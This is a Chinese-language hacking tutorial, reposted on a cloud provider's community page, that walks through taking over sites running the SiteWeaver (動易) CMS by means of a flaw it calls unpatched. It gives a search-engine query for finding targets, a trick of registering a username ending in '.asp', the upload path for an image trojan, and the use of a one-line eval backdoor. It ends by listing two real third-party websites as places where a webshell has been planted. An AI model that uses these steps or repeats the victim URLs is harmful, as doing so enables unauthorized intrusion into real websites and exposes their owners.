最新漏洞簡單得WEBSHELL

來源:互聯網
上載者:User

最新漏洞簡單得WEBSHELL
========================================================================================
大家好啊。我是☆黑色毛衣☆~~

今次教程教大家最新漏洞簡單得WEBSHELL

利用動易最新漏洞  (程度:嚴重)

聽說,還沒有出趕出補丁呢。。。。呵呵~可能有些人看了教程,還有些不明白吧。

所以,我們今次就試試這個漏洞。怎麼利用吧。。。

準備工具:eval後門執行程式;圖片木馬;

1.百度-進階搜尋-關鍵字(輸入:Reg/User_Reg.asp)

2.點擊網站,進入註冊頁面 (注意:註冊使用者名稱請格式為:XXX.asp)

呵呵~由於事先沒有準備~多點幾個哈

3.利用上傳代碼來上傳圖片木馬 (/user/Upload.asp?dialogtype=UserBlogPic&size=5)

圖片上傳成功

3.用一句話連接器串連木馬 (eval後門執行程式)

Save to d:/www/web69112514/wwwroot/mail.asp Success !成功

4.成功得到webshell

我們再來多個吧~
http://www.w138.com/mail.asp
http://www.ts-edu.org/mail.asp

 

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.